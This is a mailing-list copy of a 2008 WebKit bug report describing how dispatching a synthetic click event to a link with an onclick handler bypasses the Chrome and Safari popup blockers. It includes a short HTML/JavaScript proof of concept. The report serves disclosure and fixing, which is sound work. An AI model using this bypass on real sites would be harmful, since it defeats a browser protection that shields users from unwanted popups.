[Webkit-unassigned] [Bug 21501] New: Bypass popup blocker using click event
bugzilla-daemon at webkit.org
bugzilla-daemon at webkit.org
Thu Oct 9 05:59:43 PDT 2008
https://bugs.webkit.org/show_bug.cgi?id=21501
Summary: Bypass popup blocker using click event
Product: WebKit
Version: 528+ (Nightly build)
Platform: PC
URL: http://skypher.com/SkyLined/Repro/Safari/Bypass%20popup%
20blocker%20using%20click%20event/repro.html
OS/Version: Windows Vista
Status: NEW
Severity: Normal
Priority: P2
Component: New Bugs
AssignedTo: webkit-unassigned at lists.webkit.org
ReportedBy: skylined at chromium.org
By dispatching a "click" event to an "A" element with an "onclick" handler that
opens a popup, we can bypass the popup blockers of Chrome and Safari.
(For those with access:
http://code.google.com/p/chromium/issues/detail?id=3275)
Sample code:
<HTML>
<BODY><A id=test onclick=go()></A></BODY>
<SCRIPT>
oClickEvent = document.createEvent("MouseEvents");
oClickEvent.initEvent("click", true, true, window, 0, 0, 0, 0,
0, false, false, false, false, 0, null);
document.getElementById("test").dispatchEvent(oClickEvent);
function go() {
oWin = window.open("about:blank", "blabla");
oWin.execScript('alert("Popup blocker bypassed!");');
};
</SCRIPT>
</HTML>
Repro is available at the supplied URL.
--
Configure bugmail: https://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug, or are watching the assignee.
More information about the webkit-unassigned
mailing list